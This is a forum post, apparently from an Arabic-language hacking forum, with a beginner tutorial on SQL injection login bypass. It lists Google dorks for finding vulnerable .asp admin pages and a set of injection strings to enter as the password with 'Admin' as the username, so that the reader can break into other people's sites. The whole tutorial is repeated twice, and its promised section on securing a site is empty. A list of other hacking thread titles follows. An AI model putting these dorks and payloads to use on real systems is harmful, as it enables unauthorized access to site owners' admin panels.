Part 1
Basic sql injection Gaining authentication
bypass on an admin account. Most sites
vulnerable to this are .asp, So first we
need 2 find a site, start by opening
Google.Now we type our dork: “definition
of dork” ‘a search entry for a certain type of site/exploit”
There is a large number of google dork for basic sql injection.
Here are the best:
“inurl:admin.asp”
“inurl:login/admin.asp”
“inurl:admin/login.asp”
“inurl:adminlogin.asp”
“inurl:adminhome.asp”
“inurl:admin_login.asp”
“inurl:administratorlogin.asp”
“inurl:login/administrator.asp”
“inurl:administrator_login.asp”
Example are listed below, make sure the url looks like this
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
Now what to do once we get to our site.
the site should look something like this :
Welcome to xxxxxxxxxx administrator
panel
Username :
Password :
So what we do here is in the
USERNAME, we always type “Admin” as
the username and for our PASSWORD we type our sql injection.
Here is a list of sql injections..
‘ or ’1′=’1
‘ or ‘x’=’x
‘ or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’=’x
” or “x”=”x
‘) or (‘x’=’x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’=’a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
‘or’1=1′
TYPE ANY ONE OF THESE IN PASSWORD
SPACE… There are many more but these are the best ones that i know.
what this sql injection is doing :
Confusing the database till it gives you
authentication bypass. So your input
should look like this
username: Admin
password: ’or’1′=’1
So click submit and you’re in. . Wow.
NOTE not all sites are vulnerable.
HOW TO SECURE YOUR SITE FROM THIS
ATTACK
Basic sql injection Gaining authentication
bypass on an admin account. Most sites
vulnerable to this are .asp, So first we
need 2 find a site, start by opening
Google.Now we type our dork: “definition
of dork” ‘a search entry for a certain type of site/exploit”
There is a large number of google dork for basic sql injection.
Here are the best:
“inurl:admin.asp”
“inurl:login/admin.asp”
“inurl:admin/login.asp”
“inurl:adminlogin.asp”
“inurl:adminhome.asp”
“inurl:admin_login.asp”
“inurl:administratorlogin.asp”
“inurl:login/administrator.asp”
“inurl:administrator_login.asp”
Example are listed below, make sure the url looks like this
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
Now what to do once we get to our site.
the site should look something like this :
Welcome to xxxxxxxxxx administrator
panel
Username :
Password :
So what we do here is in the
USERNAME, we always type “Admin” as
the username and for our PASSWORD we type our sql injection.
Here is a list of sql injections..
‘ or ’1′=’1
‘ or ‘x’=’x
‘ or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’=’x
” or “x”=”x
‘) or (‘x’=’x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’=’a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
‘or’1=1′
TYPE ANY ONE OF THESE IN PASSWORD
SPACE… There are many more but these are the best ones that i know.
what this sql injection is doing :
Confusing the database till it gives you
authentication bypass. So your input
should look like this
username: Admin
password: ’or’1′=’1
So click submit and you’re in. . Wow.
NOTE not all sites are vulnerable.
HOW TO SECURE YOUR SITE FROM THIS
ATTACK
الأربعاء يونيو 04, 2014 6:55 pm من طرف Admin
» ﺍﺳﺮﻉ ﻣﻮﻗﻊ ﻟﺰﻳﺎﺩﺓ ﻭﺗﺒﺎﺩﻝ ﺍﻻﻋﺠﺎﺏ ﺍﻟﻼﻳﻜﺎﺕ ﺍﻻﻋﺠﺎﺑﺎﺕ ﺍﻟﻤﺘﺎﺑﻌﻴﻦ ﺍﻟﻤﺸﺘﺮﻛﻴﻦ ﺍﻟﻤﺸﺎﻫﺪﻳﻦ ﺍﻟﺰﻭﺍﺭ: ﺍﻟﻤﻮﻗﻊ ﺍﻻﻭﻝ ﻓﻲ ﺗﺒﺎﺩﻝ ﺍﻟﻼﻳﻜﺎﺕ ﺗﺒﺎﺩ...
الثلاثاء يونيو 03, 2014 9:19 pm من طرف Admin
» شرح تنزيل نسخة المصنع لأجهزة نكسس
الثلاثاء يونيو 03, 2014 8:37 pm من طرف Admin
» Openvpn جديد ملف سيرفرات
الثلاثاء أبريل 15, 2014 5:12 am من طرف Stame100
» ﺛﻐﺮﺓ ﺳﻬﻠﺔ ﺟﺪﺍ ﺟﺎﻫﺰﺓ ﻟﻠﻤﺒﺘﺪﺋﻴﻦ + ﺷﺮﺡ ﺑﺴﻴﻂ ﻻﺧﺘﺮﺍﻕ ﺍﻟﻤﻮﺍﻗﻊ
السبت مارس 29, 2014 5:14 am من طرف Admin
» حل مشاكل open vpn
الأربعاء مارس 19, 2014 9:40 pm من طرف Admin
» Conx موبيل زون مجـانأ 2014
الأربعاء مارس 19, 2014 9:08 pm من طرف Admin
» codes secretsAlcatel
السبت مارس 15, 2014 5:38 pm من طرف Admin
» virus for funny
الأحد مارس 02, 2014 8:11 am من طرف Admin